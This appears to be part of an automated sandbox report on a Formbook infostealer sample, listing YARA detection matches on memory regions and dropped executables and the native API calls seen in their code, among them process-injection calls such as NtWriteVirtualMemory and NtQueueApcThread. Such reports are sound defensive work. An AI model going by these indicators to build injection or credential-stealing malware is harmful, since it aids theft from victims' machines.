Source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.440159871.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.438650051.000001C6B5E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.454868060.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.439308251.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.449493611.000001C6B5DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.448788961.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.438775384.000001C6B5E12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.438537712.000001C6B5DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 6972, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A320 NtCreateFile, 3_2_0002A320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A3D0 NtReadFile, 3_2_0002A3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A450 NtClose, 3_2_0002A450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A500 NtAllocateVirtualMemory, 3_2_0002A500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A31A NtCreateFile, 3_2_0002A31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A3CA NtReadFile, 3_2_0002A3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002A4FA NtAllocateVirtualMemory, 3_2_0002A4FA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00DE98F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9840 NtDelayExecution,LdrInitializeThunk, 3_2_00DE9840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00DE9860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE99A0 NtCreateSection,LdrInitializeThunk, 3_2_00DE99A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00DE9910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A50 NtCreateFile,LdrInitializeThunk, 3_2_00DE9A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00DE9A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A20 NtResumeThread,LdrInitializeThunk, 3_2_00DE9A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE95D0 NtClose,LdrInitializeThunk, 3_2_00DE95D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9540 NtReadFile,LdrInitializeThunk, 3_2_00DE9540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00DE96E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00DE9660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00DE9FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00DE9780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00DE97A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00DE9710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE98A0 NtWriteVirtualMemory, 3_2_00DE98A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DEB040 NtSuspendThread, 3_2_00DEB040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9820 NtEnumerateKey, 3_2_00DE9820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE99D0 NtCreateProcessEx, 3_2_00DE99D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9950 NtQueueApcThread, 3_2_00DE9950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A80 NtOpenDirectoryObject, 3_2_00DE9A80
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9A10 NtQuerySection, 3_2_00DE9A10
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DEA3B0 NtGetContextThread, 3_2_00DEA3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE9B00 NtSetValueKey, 3_2_00DE9B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE95F0 NtQueryInformationFile, 3_2_00DE95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_04399860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399840 NtDelayExecution,LdrInitializeThunk, 13_2_04399840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_04399910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399540 NtReadFile,LdrInitializeThunk, 13_2_04399540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043999A0 NtCreateSection,LdrInitializeThunk, 13_2_043999A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043995D0 NtClose,LdrInitializeThunk, 13_2_043995D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399610 NtEnumerateValueKey,LdrInitializeThunk, 13_2_04399610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399660 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_04399660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399A50 NtCreateFile,LdrInitializeThunk, 13_2_04399A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399650 NtQueryValueKey,LdrInitializeThunk, 13_2_04399650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043996E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_043996E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043996D0 NtCreateKey,LdrInitializeThunk, 13_2_043996D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399710 NtQueryInformationToken,LdrInitializeThunk, 13_2_04399710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04399B00 NtSetValueKey,LdrInitializeThunk, 13_2_04399B00
